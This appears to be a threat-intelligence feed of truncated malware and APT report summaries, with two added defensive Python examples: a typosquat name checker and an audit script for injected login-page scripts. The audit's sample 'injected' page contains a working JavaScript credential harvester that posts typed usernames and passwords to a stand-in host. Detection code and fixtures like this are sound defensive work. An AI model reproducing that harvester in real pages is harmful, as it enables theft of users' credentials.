Security Joes Incident Response identified a new Linux wiper sample linked to Hamas-affiliated hacktivists, named BiBi-Linux Wiper, observed targeting Israeli companies. The malware destroys data by overwriting files, renaming them with a BiBi-containing exten…
Tag: SSO
Cyble CRIL uncovered a new Higaisa APT operation that uses a phishing site impersonating legitimate VPN software to deliver a Rust-based payload. The malware features anti-debugging, shellcode decryption, and encrypted C2 communication, with connections to add…
Insikt Group identified an application disseminated on a Telegram channel used by members or supporters of the Hamas terrorist organization.
Two campaigns targeted at Hong Kong residents used malvertising to push fake WhatsApp Web and Telegram pages, tricking victims into scanning QR codes or downloading malware. The operators aimed to steal data, impersonate accounts, and compromise devices, with …
Akira Stealer is a Python-based information stealer offered as Malware-as-a-Service (MaaS) via a dedicated portal at Akira.red, with Telegram used for updates and command-and-control. It harvests credentials, financial data, and system information, exfiltratin…
Kimsuky, a North Korea–sponsored threat group, leverages spearphishing and a suite of backdoors, infostealers, and remote-control tools to gain access and exfiltrate data from targets. The operation prominently relies on RDP and related tools (including RDP wr…
Symantec Threat Hunter Team attributes a new APT group, Grayling, to a campaign targeting multiple organizations in Taiwan’s manufacturing, IT, and biomedical sectors, with additional victims in the Pacific Islands government, Vietnam, and the U.S. The operati…
Two QR-code-based phishing campaigns are analyzed, showing attackers bypass email security by using images of text and QR codes in emails and attachments instead of readable URLs. The campaigns employ layered evasion (redirection, anti-bot checks, CAPTCHA evas…
The advisory describes active exploitation of CVE-2023-22515 in Atlassian Confluence Data Center and Server, enabling threat actors to create unauthorized Confluence administrator accounts and gain initial access. It also covers post-exploitation data exfiltra…
Phylum detected a typosquatted NuGet package that delivered the SeroXen RAT, demonstrating how open-source ecosystems can be abused. The post details the typosquatted package, its obfuscated payload chain (PowerShell, batch scripts, DLLs), and download-count a…
A spike in phishing scams targets USPS customers with SMS messages that spoof the postal service and direct users to deceptive domains to harvest personal and financial data, as well as targeting other national postal services. The operation uses USPS-branded …
ReversingLabs discovered a typosquatting npm package, node-hide-console-windows, that downloaded a DiscordRAT 2.0 executable which can deploy the r77 fileless ring‑3 rootkit to hide processes and paths. The malicious package also fetched a PyInstaller‑compiled…
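The NuGet and npm cases above are both typosquats: a malicious package whose name is one edit away from a popular one. The following is an added example, not code from Phylum or ReversingLabs, of the screening check a registry or CI gate can run before a dependency is installed. It compares each candidate name against an allow-list of popular names using an optimal-string-alignment (Damerau-Levenshtein) distance plus a separator-normalisation rule. The POPULAR lists are constructed for illustration; `node-hide-console-window` is the real npm package the reported typosquat imitated, while the NuGet names are stand-ins.

```python
"""Typosquat screening for package names (added example, not the posts' own code).
The popular-name lists are constructed; in production feed them from registry
download statistics for the ecosystem you are protecting."""
from typing import Dict, List, Optional, Tuple

# Constructed allow-list. node-hide-console-window is the genuine npm package
# the reported typosquat mimicked; the NuGet entries are illustrative only.
POPULAR: Dict[str, List[str]] = {
    "npm": ["node-hide-console-window", "lodash", "express", "chalk"],
    "nuget": ["Newtonsoft.Json", "Serilog", "Dapper"],
}


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insertion, deletion, substitution and
    swapping two adjacent characters each cost 1. Case-insensitive."""
    a, b = a.lower(), b.lower()
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def normalize(name: str) -> str:
    """Collapse case and separators so 'newtonsoft-json' equals 'Newtonsoft.Json'."""
    return name.lower().replace("-", "").replace("_", "").replace(".", "")


def check_name(ecosystem: str, candidate: str,
               max_distance: int = 1) -> Optional[Tuple[str, str]]:
    """Return (popular_name, reason) when candidate looks like a typosquat of a
    popular package in the given ecosystem, or None when it is the popular
    package itself or not close to any allow-listed name."""
    popular_names = POPULAR[ecosystem]
    if any(candidate.lower() == p.lower() for p in popular_names):
        return None  # exact (case-insensitive) match is the legitimate package
    for popular in popular_names:
        if normalize(candidate) == normalize(popular):
            return popular, "separator/case confusion"
        dist = damerau_levenshtein(candidate, popular)
        if dist <= max_distance:
            return popular, f"edit distance {dist}"
    return None


if __name__ == "__main__":
    # Constructed candidates: the first is the name from the npm report.
    for eco, name in [("npm", "node-hide-console-windows"), ("nuget", "Newtonsoft.Jsom"),
                      ("nuget", "newtonsoft-json"), ("npm", "lodash")]:
        print(eco, name, "->", check_name(eco, name))
```

The distance threshold of 1 catches the appended-letter, swapped-letter and single-typo variants seen in these campaigns; raising it catches more but also flags unrelated short names, so scope it by ecosystem and name length rather than applying one global value.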
X-Force uncovered a global NetScaler Gateway credential harvesting campaign that exploits CVE-2023-3519 to inject a credential-harvesting script into authentication pages. Attackers used attacker-controlled domains, web shells, and NSPPE crash artifacts to ena…
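A credential-harvesting injection of the kind described above leaves a visible trace in the served authentication page: a script tag the vendor never shipped, or inline JavaScript that reads the login fields and posts them to a foreign host. The following is an added example, not X-Force's tooling, of a check a defender can run against a fetched copy of the login page. The page HTML, the allow-listed origin `vpn.example.com` and the foreign host `cdn-jquery.example.net` are all constructed for the example; the regexes are heuristics and should be tuned to the appliance's real page.

```python
"""Audit an authentication page for injected script (added example, not the
report's code). Sample HTML and host names are constructed."""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Constructed: hosts the legitimate page is expected to load scripts from.
EXPECTED_ORIGINS = {"vpn.example.com"}

# Heuristics: a script that touches credential fields AND has a way to send
# data AND names a host outside the allow-list is treated as a harvester.
CREDENTIAL_FIELDS = re.compile(r"\b(passwd|password|login|username)\b", re.I)
EXFIL_CALLS = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|\.src\s*=)", re.I)
FOREIGN_URL = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._in_script = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_login_page(html: str) -> List[Dict[str, str]]:
    """Return findings for external scripts from unexpected hosts and for inline
    scripts that look like credential harvesters. Relative src values
    (no hostname) are treated as same-origin and not flagged."""
    parser = ScriptCollector()
    parser.feed(html)
    findings: List[Dict[str, str]] = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host not in EXPECTED_ORIGINS:
            findings.append({"type": "external_script", "detail": src})
    for body in parser.inline:
        hosts = {h for h in FOREIGN_URL.findall(body) if h not in EXPECTED_ORIGINS}
        if hosts and CREDENTIAL_FIELDS.search(body) and EXFIL_CALLS.search(body):
            findings.append({"type": "inline_harvester", "detail": ",".join(sorted(hosts))})
    return findings


# Constructed sample: a clean page and the same page with an injected loader
# plus an inline hook that forwards the typed credentials to a foreign host.
CLEAN_PAGE = """<html><body>
<form id="login"><input name="login"><input name="passwd" type="password"></form>
<script src="https://vpn.example.com/static/login.js"></script>
<script>document.getElementsByName("login")[0].focus();</script>
</body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<script src="https://cdn-jquery.example.net/jquery.min.js"></script>
<script>
document.getElementById("login").addEventListener("submit", function () {
  var u = document.getElementsByName("login")[0].value;
  var p = document.getElementsByName("passwd")[0].value;
  fetch("https://cdn-jquery.example.net/collect?u=" + u + "&p=" + p);
});
</script>
</body>""")

if __name__ == "__main__":
    print("clean:", audit_login_page(CLEAN_PAGE))
    print("injected:", audit_login_page(INJECTED_PAGE))
```

Run this against a page fetched from the appliance itself rather than through a CDN, and treat an empty allow-list hit as the baseline: any new external host or any inline script naming a host outside the allow-list is worth a manual look even when the heuristic does not fire.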
More than a week after it suffered a crippling ransomware attack, the hotel giant MGM is struggling to recover. The attack, linked to the ransomware-as-a-service (RaaS) group known as ALPHV, or BlackCat, caused slot machines and ATMs in MGM’s Las Vegas hotels to go dark and forced hotel staff to rev…
Talos reports that Qakbot-affiliated actors have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails since early August 2023, continuing despite the FBI’s late August 2023 infrastructure seizure. The operation suggests the de…